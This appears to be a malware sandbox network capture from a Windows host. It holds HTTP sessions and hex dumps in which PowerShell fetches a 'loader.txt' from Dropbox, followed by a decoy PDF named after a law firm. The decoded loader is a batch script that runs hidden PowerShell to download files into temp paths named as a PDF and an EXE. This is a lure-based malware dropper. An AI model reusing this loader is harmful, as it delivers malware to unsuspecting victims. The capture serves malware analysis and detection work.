                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:30 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 2e43ec5fe4354bb8bccd087bfd9fa918
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:30 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  4192.168.2.449736162.125.65.154437148C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:33 UTC370OUTGET /cd/0/get/CgDOgJacclF0FHdG2mc8i44XEOVY2ykIWtYLGNsTT4GwJiMqVt-LQiQkC8J30YyTFZIyU46zoPfriT5Cou1PPRNnXmF1J6aYfMbdSYzAs0pdxsV-K3GvMKlGKRnKD6p-rdYVNvrnTb2JA6RtOIHYrfIc/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                                                                                                                                                  Host: uc99c9846721962dead0990bdd22.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:33 UTC734INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="loader.txt"; filename*=UTF-8''loader.txt
                                                                                                                                                                                                                                                                                  Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  Etag: 1733749324039058d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Security-Policy: sandbox
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 109
                                                                                                                                                                                                                                                                                  X-Webkit-Csp: sandbox
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:33 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 626
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 40ba2139f137476780d4e0460d5dad7f
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:33 UTC626INData Raw: 40 65 63 68 6f 20 6f 66 66 0d 0a 70 6f 77 65 72 73 68 65 6c 6c 20 2d 57 69 6e 64 6f 77 53 74 79 6c 65 20 48 69 64 64 65 6e 20 2d 43 6f 6d 6d 61 6e 64 20 5e 0d 0a 20 20 20 20 22 24 52 61 6e 64 6f 6d 50 44 46 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 70 64 66 5c 22 3b 20 24 52 61 6e 64 6f 6d 45 58 45 20 3d 20 5c 22 24 65 6e 76 3a 74 65 6d 70 5c 24 28 47 65 74 2d 52 61 6e 64 6f 6d 29 2e 65 78 65 5c 22 3b 20 49 57 52 20 2d 55 72 69 20 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 72 6f 70 62 6f 78 2e 63 6f 6d 2f 73 63 6c 2f 66 69 2f 73 69 72 67 72 68 35 77 63 6f 74 72 39 34 76 72 74 37 75 34 79 2f 4c 65 77 69 73 2d 53 69 6c 6b 69 6e 2d 4c 4c 50 2e 70 64 66 3f 72 6c 6b 65 79 3d 67 79 38 36 6c 6b 66 73 77 61 69 63 31 72
                                                                                                                                                                                                                                                                                  Data Ascii: @echo offpowershell -WindowStyle Hidden -Command ^ "$RandomPDF = \"$env:temp\$(Get-Random).pdf\"; $RandomEXE = \"$env:temp\$(Get-Random).exe\"; IWR -Uri 'https://www.dropbox.com/scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1r


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  5192.168.2.449737162.125.69.184437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:34 UTC764OUTGET /scl/fi/sirgrh5wcotr94vrt7u4y/Lewis-Silkin-LLP.pdf?rlkey=gy86lkfswaic1rpangjd98k9m&dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: www.dropbox.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:35 UTC4094INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                  Content-Security-Policy: frame-ancestors 'self' https://*.dropbox.com ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; base-uri 'self' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; font-src https://* data: ; img-src https://* data: blob: ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; media-src https://* blob: ; default-src https://www.dropbox.com/playlist/ https://www.dropbox.com/v/s/playlist/ https://*.dropboxusercontent.com/p/hls_master_playlist/ https://*.dropboxusercontent.com/p/hls_playlist/ ; style-src https://* 'unsafe-inline' 'unsafe-eval' ; script-src 'unsafe-eval' 'inline-speculation-rules' https://www.dropbox.com/static/api/ https://www.dropbox.com/pithos/* https://www.dropbox.com/page_success/ https://cfl.dropboxstatic.com/s [TRUNCATED]
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                  Location: https://uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com/cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1#
                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                  Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                  Set-Cookie: gvc=Mjg5Mjk5NzUwMjQ4ODg2NTE4MTI2Mjc5OTM3MjkyMjEyMDY4MjU3; Path=/; Expires=Sun, 09 Dec 2029 17:41:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: t=4_jNU9-otPhdRtvnXA_fxZ2k; Path=/; Domain=dropbox.com; Expires=Wed, 10 Dec 2025 17:41:34 GMT; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-js_csrf=4_jNU9-otPhdRtvnXA_fxZ2k; Path=/; Expires=Wed, 10 Dec 2025 17:41:34 GMT; Secure; SameSite=None
                                                                                                                                                                                                                                                                                  Set-Cookie: __Host-ss=GnlWfVuQN4; Path=/; Expires=Wed, 10 Dec 2025 17:41:34 GMT; HttpOnly; Secure; SameSite=Strict
                                                                                                                                                                                                                                                                                  Set-Cookie: locale=en_GB; Path=/; Domain=dropbox.com; Expires=Sun, 09 Dec 2029 17:41:34 GMT
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                  Content-Length: 17
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:35 GMT
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 3bfe646fe7a34a5696d60dfacaeed914
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:35 UTC17INData Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e
                                                                                                                                                                                                                                                                                  Data Ascii: ...status=302-->


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  6192.168.2.449749162.125.69.154437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC888OUTGET /cd/0/get/CgDBoQi0xx9LrfNKbiBhRK2o5A90NugP4SzyD76WgsL8Uv2E3XrvNp-WD27q_ACUDD072v7-jemMeUbODu5Z4NJgGyrMZHNxCbk66wtc9B1kE5Hfwiu4dumWUuuQRuM5yGGy8zvi3r3PaO9WkT-HIZJn/file?dl=1 HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: uc1d488445c67e91a5065449fe08.dl.dropboxusercontent.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                  Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC668INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Content-Type: application/binary
                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                  Cache-Control: max-age=60
                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="Lewis Silkin LLP.pdf"; filename*=UTF-8''Lewis%20Silkin%20LLP.pdf
                                                                                                                                                                                                                                                                                  Etag: 1733684767914485d
                                                                                                                                                                                                                                                                                  Pragma: public
                                                                                                                                                                                                                                                                                  Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                                                  Vary: Origin
                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                  X-Robots-Tag: noindex, nofollow, noimageindex
                                                                                                                                                                                                                                                                                  X-Server-Response-Time: 152
                                                                                                                                                                                                                                                                                  Date: Tue, 10 Dec 2024 17:41:37 GMT
                                                                                                                                                                                                                                                                                  Server: envoy
                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                  Content-Length: 106848
                                                                                                                                                                                                                                                                                  X-Dropbox-Response-Origin: far_remote
                                                                                                                                                                                                                                                                                  X-Dropbox-Request-Id: 6457b8672281410ca34940bad1970b5a
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC15716INData Raw: 25 50 44 46 2d 31 2e 37 0d 0a 25 b5 b5 b5 b5 0d 0a 31 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 43 61 74 61 6c 6f 67 2f 50 61 67 65 73 20 32 20 30 20 52 2f 4c 61 6e 67 28 65 6e 29 20 2f 53 74 72 75 63 74 54 72 65 65 52 6f 6f 74 20 32 35 20 30 20 52 2f 4d 61 72 6b 49 6e 66 6f 3c 3c 2f 4d 61 72 6b 65 64 20 74 72 75 65 3e 3e 2f 4d 65 74 61 64 61 74 61 20 38 35 20 30 20 52 2f 56 69 65 77 65 72 50 72 65 66 65 72 65 6e 63 65 73 20 38 36 20 30 20 52 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 32 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 73 2f 43 6f 75 6e 74 20 32 2f 4b 69 64 73 5b 20 33 20 30 20 52 20 32 30 20 30 20 52 5d 20 3e 3e 0d 0a 65 6e 64 6f 62 6a 0d 0a 33 20 30 20 6f 62 6a 0d 0a 3c 3c 2f 54 79 70 65 2f 50 61 67 65 2f 50 61 72 65 6e 74 20
                                                                                                                                                                                                                                                                                  Data Ascii: %PDF-1.7%1 0 obj<</Type/Catalog/Pages 2 0 R/Lang(en) /StructTreeRoot 25 0 R/MarkInfo<</Marked true>>/Metadata 85 0 R/ViewerPreferences 86 0 R>>endobj2 0 obj<</Type/Pages/Count 2/Kids[ 3 0 R 20 0 R] >>endobj3 0 obj<</Type/Page/Parent
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC16384INData Raw: 45 18 32 c4 60 66 ce 30 54 e4 7e 84 fe 55 d0 7c 1f d4 fe d7 e1 27 b3 63 96 b3 9d 95 46 7f 85 be 61 fa 96 ad 4f 89 9a 48 d5 bc 1d 38 05 44 90 3a ca ac c7 00 73 82 49 f4 c1 27 f0 ae 3f e1 8d 9d f6 87 ae 5f a9 86 69 74 f9 63 da 24 44 24 31 07 28 c3 d8 a9 3c d6 56 71 af 7e 8c f4 95 48 57 ca 7d 9b 7e f4 1e 9f d7 a3 3d 83 b5 79 07 c5 7b 59 34 bf 13 68 de 23 81 4e 63 c0 72 3d 51 83 0f cc 13 f9 57 af a9 dc a0 e0 8c 8e 86 b8 af 8a 5a 57 f6 8f 82 ae 24 45 06 5b 47 59 d7 3e 83 83 fa 12 7f 0a da ba bd 36 79 b9 65 55 4f 15 1b ec f4 7f 3d 0e c6 da 74 b9 b6 8e 78 ce 63 91 43 a9 f5 04 64 54 b5 c9 fc 38 d5 46 ab e0 9b 17 e0 3c 00 db b2 8e db 38 03 fe f9 db 5d 65 5c 65 cd 14 ce 5a f4 dd 2a 92 a6 fa 3b 05 14 51 54 64 14 51 45 00 14 76 aa 5a ad c4 f6 9a 55 d5 c5 b2 07 9a 28
                                                                                                                                                                                                                                                                                  Data Ascii: E2`f0T~U|'cFaOH8D:sI'?_itc$D$1(<Vq~HW}~=y{Y4h#Ncr=QWZW$E[GY>6yeUO=txcCdT8F<8]e\eZ*;QTdQEvZU(
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC668INData Raw: 14 67 8c 12 4e 96 75 65 7a 7a 49 71 f1 f0 59 4d bd bf 63 83 af ca f1 16 8f 1d 3e e8 96 de d7 e5 4d 7f 3a f4 19 da 18 37 c9 58 78 ad 31 71 1d 03 17 8d 32 c9 ae c6 ca ae 86 4c cf 98 5e 33 bd 6f 52 62 65 2f 1f d3 89 b8 d4 d4 0c a3 ec a2 37 26 36 d6 b8 42 74 98 6b ef 97 73 ef 24 fa 30 d5 52 d9 5c f1 1e 95 4c 91 fd 60 ab d1 05 6b 37 79 75 d2 fd 8c 17 e0 7c d2 85 ee 6e 1f 95 3a 32 37 77 ac e6 e2 e0 ef b8 e1 55 be eb d6 88 57 b5 bd 93 f8 3a f5 16 4a a2 6a cd 2b e7 b6 84 07 13 f8 f7 62 6f 4c e0 31 77 1a 13 e8 4e 96 84 1b 53 8c 71 77 5c 66 8d 8e e9 3a fa d5 5e 26 5d 98 7f f2 ac c7 63 f1 c8 19 75 72 38 6e 62 6c be b5 9b 25 c1 1e 73 48 86 2e 39 7b 50 36 2f b4 50 51 b2 4e c7 93 fb a5 0e e4 7c dd 1d cd 5b ee 61 05 a7 bf b3 7d aa 23 63 d2 d5 bd 2d ae c9 0b 6f 65 9d bf
                                                                                                                                                                                                                                                                                  Data Ascii: gNuezzIqYMc>M:7Xx1q2L^3oRbe/7&6Btks$0R\L`k7yu|n:27wUW:Jj+boL1wNSqw\f:^&]cur8nbl%sH.9{P6/PQN|[a}#c-oe
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC16384INData Raw: 51 18 94 6c 67 a6 be 6f af d1 66 af 6e e5 a2 55 46 bd de e4 4a ec 37 bc b8 7a 54 d9 a2 cd bd 7b 72 32 37 d7 24 99 8d fd 8c c5 23 86 57 b5 d5 2f ea 92 e3 73 2b f6 d0 16 bc 11 4c 34 56 f3 bb 3f 96 83 49 78 8d de e2 42 a3 b7 a4 b0 de c8 76 18 f7 19 b9 71 43 ac dc 13 2c a7 57 61 d1 48 df b0 6b 07 49 a7 b9 22 43 74 e1 5e 47 79 5e 6d 8b 7b 52 a3 c3 f2 bc 72 57 9b 14 7e 5f 3c a6 2e 26 0b 65 d1 ef 64 4b c1 06 83 3d c4 74 41 55 4d 96 cc 6c ce 08 b1 78 6f a2 31 83 b2 bd d9 dc 9b ed cf de 99 7d 3c 5b c9 4e 90 e2 b8 7a bc fc d6 d3 66 bc d4 54 4a 77 1d 64 03 19 de 11 91 58 61 51 cf 5f 75 7a ca c9 be e9 5b 7e a5 77 32 cb 72 66 65 66 71 1d 67 82 71 9d de d5 df 3a c0 3a d0 2a 74 49 d9 f1 2e 53 76 5a 7a 6a 3a d7 39 94 84 46 b2 e9 32 1a 59 bf 38 a4 52 62 91 ca 62 f6 46 66
                                                                                                                                                                                                                                                                                  Data Ascii: QlgofnUFJ7zT{r27$#W/s+L4V?IxBvqC,WaHkI"Ct^Gy^m{RrW~_<.&edK=tAUMlxo1}<[NzfTJwdXaQ_uz[~w2rfefqgq::*tI.SvZzj:9F2Y8RbbFf
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC16074INData Raw: f7 8f f9 69 ff f7 e9 5f 52 2c 56 ca d5 54 17 fe c8 c2 72 fe b5 68 6d 6b ab 7d f5 0f 98 02 f6 af 11 5c 56 a9 d5 4c 41 8f ca 05 b4 ab 70 a0 70 b0 c0 14 7c e0 cf 0b 12 a8 52 a1 5c cd 31 63 03 68 00 ae cd 8a b5 1c 37 7e 32 21 bb 49 e3 77 84 b7 1a 00 92 c5 62 c5 0a 38 a0 46 d3 28 4d 64 b7 29 50 3a 90 46 6b d2 c3 e9 c9 f4 c9 b4 29 6d 83 3d d3 f3 bc 32 6e fc bb ee 04 43 93 be 41 d9 5a d8 aa 6f 3d 84 ef b9 79 2b 1c 1a 12 a5 d2 56 db 81 fb 97 a1 65 84 f1 5a 56 54 bc c8 ee 1d f6 fe 1c 3b 97 fa dc 7f e8 0e 92 e3 22 01 10 f1 92 df e8 ad d3 df d7 5d 0f d6 50 ad 58 60 fa 19 ba 9f 41 14 23 c3 82 74 f8 56 fa c3 25 52 e3 b3 32 f0 f5 00 df a1 f1 14 5c 23 73 f5 96 ad cf a0 1b a9 18 b2 1c d9 0f c3 43 c6 e4 a2 d1 e9 d1 19 d2 98 d6 46 4f cb da c8 fb 64 43 33 26 0e 8f c8 a7 31
                                                                                                                                                                                                                                                                                  Data Ascii: i_R,VTrhmk}\VLApp|R\1ch7~2!Iwb8F(Md)P:Fk)m=2nCAZo=y+VeZVT;"]PX`A#tV%R2\#sCFOdC3&1
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC310INData Raw: d1 55 6d 06 74 86 50 bd 0c be b2 f5 d3 db ba 43 c6 fc e0 b0 c3 96 ab 74 a5 7c c1 44 82 e2 ba 46 b7 f6 1f b6 d6 fc fa 68 b6 98 f2 71 c9 72 29 63 61 a3 4e f7 ca 58 6d ba e2 a5 ab 9f b8 9e cb 59 45 8f dc 9f c0 a3 b9 c1 94 53 f0 cb 3d 3d 15 47 f7 78 c6 ad d1 10 16 36 52 1a c9 c8 23 39 bf d6 ea 30 69 71 07 8c 30 8c 6c b2 2f 9b 1b 91 7d 56 0d 41 5c fa 9a 4e 27 d5 46 05 66 7c 65 05 c7 91 ae 5f 71 f9 97 1a 1c e2 b0 81 1d 6a 0a 1b 64 50 71 8c 38 f0 bd 32 a8 37 1a 58 20 18 04 21 18 b4 f7 2d 2e 9e d2 67 3b 03 29 ca ac 4a 81 54 30 00 e0 d7 6d 94 72 8d c6 ba 2a a8 e6 20 9c be e3 96 a2 68 7d 96 46 01 a2 07 d1 0b 12 8e 2e c0 78 b1 bd fa 09 8c 1a 91 d9 9e 43 0b db 42 f4 00 21 43 2c 18 62 27 af 41 9d d5 10 3a 6e 8b 76 49 5f b8 dc 10 46 aa 1e 21 7e 2f ea ad ae 00 c3 f5 8d
                                                                                                                                                                                                                                                                                  Data Ascii: UmtPCt|DFhqr)caNXmYES==Gx6R#90iq0l/}VA\N'Ff|e_qjdPq827X !-.g;)JT0mr* h}F.xCB!C,b'A:nvI_F!~/
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC16384INData Raw: c9 db 1a b7 3d bb 7f eb c9 dd fd 11 6b ac c0 44 63 29 8f d3 56 1b 1a ae 89 63 0f 9e 3d 78 f3 0f 4f 4d 85 ac 94 49 8f 6b ac 41 1f 92 52 2f 94 d2 4d 10 5b 7e ac 88 ed 68 72 27 d2 a0 96 06 d5 d4 23 29 bc 16 05 0f 19 c1 08 09 86 09 30 84 03 2d a2 4b c0 96 08 26 1e 4b 3c 9d d0 24 12 ae b2 9f 2e 8a 2e 5e 90 68 de 4a 15 65 c9 c7 63 cb 41 06 e4 f9 f7 d5 71 83 33 f3 4b 19 8a 85 b0 01 e1 68 79 d8 0f 54 2a 68 da 20 82 d5 b8 e3 f1 f7 1e 1b b6 25 46 ca bd 77 1c bd b3 a1 6c 49 75 05 4c 36 a1 1c 01 35 4a 4c ca 6e df f4 cc 96 95 f2 c0 ad 4f 6f b1 c6 62 12 45 5c 58 75 ff 37 67 22 3b f6 ed 4e 40 d1 d6 88 96 60 21 82 1f 4d 77 05 8d c2 a5 9b 08 bd 96 b0 46 1a db 1e dc b0 ef 99 23 75 40 10 00 a2 a2 04 65 6a 2f 6c 77 11 bb a1 59 8e 48 a2 d5 6a a7 69 11 ad 7c 12 14 81 28 a6 cb
                                                                                                                                                                                                                                                                                  Data Ascii: =kDc)Vc=xOMIkAR/M[~hr'#)0-K&K<$..^hJecAq3KhyT*h %FwlIuL65JLnOobE\Xu7g";N@`!MwF#u@ej/lwYHji|(
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC16384INData Raw: 27 cb 47 8c 2b bd b6 b1 c2 c6 78 e6 d3 8c 29 7d 26 4e 2d e8 77 c3 63 75 f7 23 ef 3c d4 aa a9 5b 54 db dc fc 4a 9a 91 b1 a6 32 c6 d4 cc ba 95 2d de dd cd 6f 0e 60 ec e6 cd 8c e9 1f 9a d7 3c 7f d1 fa 77 d5 41 8c 2d a9 67 cc 16 98 df 74 fa bc d7 ca 77 14 32 b6 6d 14 63 f6 0f 1a 1b 6a eb 3b 0f df f3 1a da b3 a2 bd 81 8d 70 d8 ee 49 3f 88 34 da 63 59 8d 8b 5a 56 0f 1b 63 3c 84 f4 47 8c 2d 9c d9 b4 a4 ae b6 ed c8 a6 53 18 db d5 9b b1 41 86 45 b5 ab 9b f3 17 65 ff 09 f9 8d 28 ef 5d d4 d0 52 7b ed d9 5b 57 32 de 7d 2f d2 e7 2c ae 5d d4 e0 8a bf 70 05 63 9f e1 99 7d 5a 9a 97 2c 6f e9 72 b3 8d 18 cf 9d a2 7c f3 b2 86 e6 db 7f 58 f0 08 63 6b 2f c6 e3 be 67 62 2e 0c 23 2e 5a 18 77 f5 b7 73 ec 43 bf 66 a9 26 26 ec c1 4f d6 3e 27 f8 9d ef 6e 7d f2 87 43 47 5a e3 3e 35
                                                                                                                                                                                                                                                                                  Data Ascii: 'G+x)}&N-wcu#<[TJ2-o`<wA-gtw2mcj;pI?4cYZVc<G-SAEe(]R{[W2}/,]pc}Z,or|Xck/gb.#.ZwsCf&&O>'n}CGZ>5
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:38 UTC8544INData Raw: 1d 4b 08 48 1c 19 42 6c 58 e3 d4 c8 32 a0 b4 fc cb 65 7b 3a 6f eb eb 54 26 bf d8 7a eb 67 67 eb 34 2d 5b e9 5b 35 62 d4 8d 76 e5 bd a2 12 5a f7 fd ce 67 e4 cf 6f 3b 6f 38 32 89 27 5c b4 6a e6 2f 61 da 81 7d 3c 9e 76 d9 ea d5 e2 cd e0 fc 4b d1 1b 84 e1 75 ee 26 8c 9f a0 71 1e b3 fe cc 45 e5 5a e1 05 c1 98 b0 77 b7 d3 56 ae 39 b7 78 a2 f5 51 ff e3 d7 fc 44 1d 16 0e b2 4f 7c b3 f3 85 de f9 4b f1 b9 21 5d 0f 2e 90 5d 59 39 e4 a8 5b 16 e7 89 a7 62 77 95 6d d9 88 3e 5b 4f da 46 ba f6 9b 32 ee 6a b6 57 72 ee b1 79 0d 1b f4 ef f7 8d ac cc e1 d9 77 69 97 0e ec 55 e7 df bc b8 2d db e3 f9 e2 62 a7 c7 64 b1 d3 23 a3 79 f9 7c ae b8 d8 e9 1a b4 5d ae 71 36 75 3a 06 4d 87 79 5c fe 87 67 d3 62 6e aa a5 8d c1 9d 8e 70 3c 2d e6 86 83 6d bb 42 47 47 88 67 96 f4 a8 0c 6b 3e
                                                                                                                                                                                                                                                                                  Data Ascii: KHBlX2e{:oT&zgg4-[[5bvZgo;o82'\j/a}<vKu&qEZwV9xQDO|K!].]Y9[bwm>[OF2jWrywiU-bd#y|]q6u:My\gbnp<-mBGGgk>


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  7192.168.2.449750142.250.181.654437952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-10 17:41:37 UTC594OUTGET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
